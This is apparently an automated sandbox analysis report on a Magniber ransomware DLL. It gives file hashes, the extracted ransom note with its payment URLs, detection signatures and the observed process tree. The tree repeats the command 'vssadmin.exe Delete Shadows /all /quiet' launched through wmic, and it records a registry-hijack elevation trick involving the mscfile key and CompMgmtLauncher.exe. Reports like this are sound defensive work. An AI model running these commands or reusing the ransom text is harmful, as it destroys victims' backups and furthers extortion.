magniber | c7d0dd48bc5c3d78570fa583b6c05ec65202c6abb9d6bcf1a1bb7c5d5b74e091

Analysis

max time kernel
121s
max time network
127s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
21-03-2024 10:43

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

db6e1b6448189f395724004a5465ce8c.dll
Size

38KB
MD5

db6e1b6448189f395724004a5465ce8c
SHA1

96ae8d941c0f4a4f57e0c2e621ee57e82ccd88e4
SHA256

c7d0dd48bc5c3d78570fa583b6c05ec65202c6abb9d6bcf1a1bb7c5d5b74e091
SHA512

330f7b442764c93f9e972c95ac68dffce44a58fc0c56348b0d5169a5a7ba34ddce6dca5ee5f6d7fa1751cffdebec76f128cae9dbc182c807211a91c7bf2f9532
SSDEEP

768:Hxk0dnXaA0tiqdwmWlCh+o6pMauVwhQg63nJC0fGu+/wpQO9Jp1Lwu:C0otY9iH3auVwKgcJPkJO7

Score

10^/10

magniber ransomware

Malware Config

Extracted

Path

C:\Users\Admin\Pictures\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://00c04840242cfc406ecytywyhto.ntjflrx6uhwcmfhnn3yewv2wfhtqtjyfkvyrvjz4wuo6uw33yw7sfiid.onion/cytywyhto Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://00c04840242cfc406ecytywyhto.bitslet.uno/cytywyhto http://00c04840242cfc406ecytywyhto.canyour.xyz/cytywyhto http://00c04840242cfc406ecytywyhto.dogper.space/cytywyhto http://00c04840242cfc406ecytywyhto.ballcan.xyz/cytywyhto Note! These are temporary addresses! They will be available for a limited amount of time!

URLs

http://00c04840242cfc406ecytywyhto.ntjflrx6uhwcmfhnn3yewv2wfhtqtjyfkvyrvjz4wuo6uw33yw7sfiid.onion/cytywyhto

http://00c04840242cfc406ecytywyhto.bitslet.uno/cytywyhto

http://00c04840242cfc406ecytywyhto.canyour.xyz/cytywyhto

http://00c04840242cfc406ecytywyhto.dogper.space/cytywyhto

http://00c04840242cfc406ecytywyhto.ballcan.xyz/cytywyhto

Signatures

Detect magniber ransomware 2 IoCs

resource	yara_rule
behavioral1/memory/1824-0-0x0000000001E00000-0x000000000213D000-memory.dmp	family_magniber
behavioral1/memory/1140-16-0x0000000000350000-0x0000000000355000-memory.dmp	family_magniber

Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
ransomware magniber

Process spawned unexpected child process 12 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2168	892	cmd.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1508	892	vssadmin.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2796	892	vssadmin.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1184	892	vssadmin.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1676	892	cmd.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1524	892	vssadmin.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1736	892	vssadmin.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1100	892	cmd.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3068	892	vssadmin.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	884	892	vssadmin.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	892	cmd.exe	36
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2416	892	vssadmin.exe	36

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (86) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1824 set thread context of 1140	1824	rundll32.exe	19
PID 1824 set thread context of 1232	1824	rundll32.exe	20
PID 1824 set thread context of 1296	1824	rundll32.exe	21
PID 1824 set thread context of 636	1824	rundll32.exe	23

Interacts with shadow copies 2 TTPs 8 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
1524	vssadmin.exe
1736	vssadmin.exe
3068	vssadmin.exe
884	vssadmin.exe
2416	vssadmin.exe
1508	vssadmin.exe
2796	vssadmin.exe
1184	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 34 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 104a61de7c7bda01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "417179764"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ffebb09deeb747419e902f1accea58f70000000002000000000010660000000100002000000000a41dd48cd53e7029e473e1acc555bf9457dcdc0ade4cfaab83720a46bde7ab000000000e800000000200002000000084328341740d8ad9fec3a06ba790d1eb039831d9ec619d39d18f886d109d3f8790000000fcc81e0014fbca34327fa6fd679ec4bf9d0ac26acb1b5baa2bd7b097ae3e2a3e2e833736722401b8f49380ec19ec2c52ab21cedd16a7d0d15df81470e6e9b5a8570833409d3292348deed8df66cdfc26820fd6b5dfad960420dd0060e29a655dc8dcee7413d686387a2e3dbe7d6e48458801a34f7f64a0406e0e3b891bcd78ab18480d5e69bcf5b996cb5d739633403f400000000d2961ce0ac09ec032b3bd1dc85029b45db7e6c74558aca5cd123a761ed9bdf2edd2d15f2bb38c3c9dc505b2d5ada22c18970633093beacff3c70677acb6ceef	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000ffebb09deeb747419e902f1accea58f700000000020000000000106600000001000020000000af34b534396892727791a3bd95de230863a9a6280f2cbe5daa64ee41561b77d8000000000e80000000020000200000007ca249f11002df1dc0826d60e272c2d2d835c2adcfba7986904baf508494bcf4200000001a44d281e271901478494498ba9dfc6d2b369af4984438c27f1e48228a2f0a9040000000267d48e000d3dc16d8e7c92a4cebd21b30ad83711d66ec1bd31f7a5a1e14644ba0562f9f70f12212790a79d320937fd424f542230267a331700013a8245eb51b	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{0697F741-E770-11EE-9D93-569FD5A164C1} = "0"	iexplore.exe

Modifies registry class 11 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile\shell\open\command	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile\shell\open	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile\shell\open\command	Dwm.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile\shell\open\command	rundll32.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	rundll32.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile\shell	taskhost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	taskhost.exe
Key created	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile\shell\open\command	Explorer.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2461186416-2307104501-1787948496-1000_CLASSES\mscfile\shell\open\command\ = "C:\\Windows\\system32\\wbem\\wmic process call create \"vssadmin.exe Delete Shadows /all /quiet\""	Explorer.EXE

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1172	notepad.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1824	rundll32.exe
1824	rundll32.exe

Suspicious behavior: MapViewOfSection 4 IoCs

pid	Process
1824	rundll32.exe
1824	rundll32.exe
1824	rundll32.exe
1824	rundll32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1296	Explorer.EXE
Token: SeShutdownPrivilege	1296	Explorer.EXE
Token: SeShutdownPrivilege	1296	Explorer.EXE
Token: SeShutdownPrivilege	1296	Explorer.EXE
Token: SeIncreaseQuotaPrivilege	648	wmic.exe
Token: SeSecurityPrivilege	648	wmic.exe
Token: SeTakeOwnershipPrivilege	648	wmic.exe
Token: SeLoadDriverPrivilege	648	wmic.exe
Token: SeSystemProfilePrivilege	648	wmic.exe
Token: SeSystemtimePrivilege	648	wmic.exe
Token: SeProfSingleProcessPrivilege	648	wmic.exe
Token: SeIncBasePriorityPrivilege	648	wmic.exe
Token: SeCreatePagefilePrivilege	648	wmic.exe
Token: SeBackupPrivilege	648	wmic.exe
Token: SeRestorePrivilege	648	wmic.exe
Token: SeShutdownPrivilege	648	wmic.exe
Token: SeDebugPrivilege	648	wmic.exe
Token: SeSystemEnvironmentPrivilege	648	wmic.exe
Token: SeRemoteShutdownPrivilege	648	wmic.exe
Token: SeUndockPrivilege	648	wmic.exe
Token: SeManageVolumePrivilege	648	wmic.exe
Token: 33	648	wmic.exe
Token: 34	648	wmic.exe
Token: 35	648	wmic.exe
Token: SeIncreaseQuotaPrivilege	2972	WMIC.exe
Token: SeSecurityPrivilege	2972	WMIC.exe
Token: SeTakeOwnershipPrivilege	2972	WMIC.exe
Token: SeLoadDriverPrivilege	2972	WMIC.exe
Token: SeSystemProfilePrivilege	2972	WMIC.exe
Token: SeSystemtimePrivilege	2972	WMIC.exe
Token: SeProfSingleProcessPrivilege	2972	WMIC.exe
Token: SeIncBasePriorityPrivilege	2972	WMIC.exe
Token: SeCreatePagefilePrivilege	2972	WMIC.exe
Token: SeBackupPrivilege	2972	WMIC.exe
Token: SeRestorePrivilege	2972	WMIC.exe
Token: SeShutdownPrivilege	2972	WMIC.exe
Token: SeDebugPrivilege	2972	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2972	WMIC.exe
Token: SeRemoteShutdownPrivilege	2972	WMIC.exe
Token: SeUndockPrivilege	2972	WMIC.exe
Token: SeManageVolumePrivilege	2972	WMIC.exe
Token: 33	2972	WMIC.exe
Token: 34	2972	WMIC.exe
Token: 35	2972	WMIC.exe
Token: SeIncreaseQuotaPrivilege	648	wmic.exe
Token: SeSecurityPrivilege	648	wmic.exe
Token: SeTakeOwnershipPrivilege	648	wmic.exe
Token: SeLoadDriverPrivilege	648	wmic.exe
Token: SeSystemProfilePrivilege	648	wmic.exe
Token: SeSystemtimePrivilege	648	wmic.exe
Token: SeProfSingleProcessPrivilege	648	wmic.exe
Token: SeIncBasePriorityPrivilege	648	wmic.exe
Token: SeCreatePagefilePrivilege	648	wmic.exe
Token: SeBackupPrivilege	648	wmic.exe
Token: SeRestorePrivilege	648	wmic.exe
Token: SeShutdownPrivilege	648	wmic.exe
Token: SeDebugPrivilege	648	wmic.exe
Token: SeSystemEnvironmentPrivilege	648	wmic.exe
Token: SeRemoteShutdownPrivilege	648	wmic.exe
Token: SeUndockPrivilege	648	wmic.exe
Token: SeManageVolumePrivilege	648	wmic.exe
Token: 33	648	wmic.exe
Token: 34	648	wmic.exe
Token: 35	648	wmic.exe

Suspicious use of FindShellTrayWindow 7 IoCs

pid	Process
1588	iexplore.exe
1296	Explorer.EXE
1296	Explorer.EXE
1296	Explorer.EXE
1296	Explorer.EXE
1296	Explorer.EXE
1296	Explorer.EXE

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
1296	Explorer.EXE
1296	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1588	iexplore.exe
1588	iexplore.exe
2560	IEXPLORE.EXE
2560	IEXPLORE.EXE
2560	IEXPLORE.EXE
2560	IEXPLORE.EXE

Suspicious use of UnmapMainImage 2 IoCs

pid	Process
1296	Explorer.EXE
1296	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1140 wrote to memory of 1172	1140	taskhost.exe	28
PID 1140 wrote to memory of 1172	1140	taskhost.exe	28
PID 1140 wrote to memory of 1172	1140	taskhost.exe	28
PID 1140 wrote to memory of 296	1140	taskhost.exe	29
PID 1140 wrote to memory of 296	1140	taskhost.exe	29
PID 1140 wrote to memory of 296	1140	taskhost.exe	29
PID 1140 wrote to memory of 648	1140	taskhost.exe	30
PID 1140 wrote to memory of 648	1140	taskhost.exe	30
PID 1140 wrote to memory of 648	1140	taskhost.exe	30
PID 1140 wrote to memory of 564	1140	taskhost.exe	31
PID 1140 wrote to memory of 564	1140	taskhost.exe	31
PID 1140 wrote to memory of 564	1140	taskhost.exe	31
PID 564 wrote to memory of 2972	564	cmd.exe	35
PID 564 wrote to memory of 2972	564	cmd.exe	35
PID 564 wrote to memory of 2972	564	cmd.exe	35
PID 296 wrote to memory of 1588	296	cmd.exe	37
PID 296 wrote to memory of 1588	296	cmd.exe	37
PID 296 wrote to memory of 1588	296	cmd.exe	37
PID 2168 wrote to memory of 1948	2168	cmd.exe	43
PID 2168 wrote to memory of 1948	2168	cmd.exe	43
PID 2168 wrote to memory of 1948	2168	cmd.exe	43
PID 1588 wrote to memory of 2560	1588	iexplore.exe	45
PID 1588 wrote to memory of 2560	1588	iexplore.exe	45
PID 1588 wrote to memory of 2560	1588	iexplore.exe	45
PID 1588 wrote to memory of 2560	1588	iexplore.exe	45
PID 1948 wrote to memory of 1220	1948	CompMgmtLauncher.exe	47
PID 1948 wrote to memory of 1220	1948	CompMgmtLauncher.exe	47
PID 1948 wrote to memory of 1220	1948	CompMgmtLauncher.exe	47
PID 1296 wrote to memory of 844	1296	Explorer.EXE	55
PID 1296 wrote to memory of 844	1296	Explorer.EXE	55
PID 1296 wrote to memory of 844	1296	Explorer.EXE	55
PID 1296 wrote to memory of 1792	1296	Explorer.EXE	56
PID 1296 wrote to memory of 1792	1296	Explorer.EXE	56
PID 1296 wrote to memory of 1792	1296	Explorer.EXE	56
PID 1792 wrote to memory of 1992	1792	cmd.exe	59
PID 1792 wrote to memory of 1992	1792	cmd.exe	59
PID 1792 wrote to memory of 1992	1792	cmd.exe	59
PID 1676 wrote to memory of 1536	1676	cmd.exe	64
PID 1676 wrote to memory of 1536	1676	cmd.exe	64
PID 1676 wrote to memory of 1536	1676	cmd.exe	64
PID 1536 wrote to memory of 980	1536	CompMgmtLauncher.exe	65
PID 1536 wrote to memory of 980	1536	CompMgmtLauncher.exe	65
PID 1536 wrote to memory of 980	1536	CompMgmtLauncher.exe	65
PID 1232 wrote to memory of 1584	1232	Dwm.exe	69
PID 1232 wrote to memory of 1584	1232	Dwm.exe	69
PID 1232 wrote to memory of 1584	1232	Dwm.exe	69
PID 1232 wrote to memory of 1896	1232	Dwm.exe	70
PID 1232 wrote to memory of 1896	1232	Dwm.exe	70
PID 1232 wrote to memory of 1896	1232	Dwm.exe	70
PID 1896 wrote to memory of 1968	1896	cmd.exe	73
PID 1896 wrote to memory of 1968	1896	cmd.exe	73
PID 1896 wrote to memory of 1968	1896	cmd.exe	73
PID 1100 wrote to memory of 1712	1100	cmd.exe	78
PID 1100 wrote to memory of 1712	1100	cmd.exe	78
PID 1100 wrote to memory of 1712	1100	cmd.exe	78
PID 1712 wrote to memory of 2996	1712	CompMgmtLauncher.exe	79
PID 1712 wrote to memory of 2996	1712	CompMgmtLauncher.exe	79
PID 1712 wrote to memory of 2996	1712	CompMgmtLauncher.exe	79
PID 1824 wrote to memory of 2396	1824	rundll32.exe	83
PID 1824 wrote to memory of 2396	1824	rundll32.exe	83
PID 1824 wrote to memory of 2396	1824	rundll32.exe	83
PID 1824 wrote to memory of 2168	1824	rundll32.exe	84
PID 1824 wrote to memory of 2168	1824	rundll32.exe	84
PID 1824 wrote to memory of 2168	1824	rundll32.exe	84

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\taskhost.exe
"taskhost.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1140
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:1172
- C:\Windows\system32\cmd.exe
  cmd /c "start http://00c04840242cfc406ecytywyhto.bitslet.uno/cytywyhto^&2^&42103757^&86^&373^&12"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:296
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://00c04840242cfc406ecytywyhto.bitslet.uno/cytywyhto&2&42103757&86&373&12
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1588
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1588 CREDAT:275457 /prefetch:2
      4⤵
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2560
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:648
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:564
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2972

C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1232
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1584
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1968

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1296
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\db6e1b6448189f395724004a5465ce8c.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1824
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2396
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
    3⤵
    PID:2168
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
      4⤵
      PID:2752
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:844
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1792
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
    3⤵
    PID:1992

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:636

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1948
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1220

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1508

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:2576

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2796

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1184

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1676
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1536
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:980

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1524

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1736

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1100
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1712
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:2996

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3068

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:884

C:\Windows\system32\cmd.exe
cmd /c CompMgmtLauncher.exe
1⤵
- Process spawned unexpected child process
PID:2736
- C:\Windows\system32\CompMgmtLauncher.exe
  CompMgmtLauncher.exe
  2⤵
  PID:3036
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1412

C:\Windows\system32\vssadmin.exe
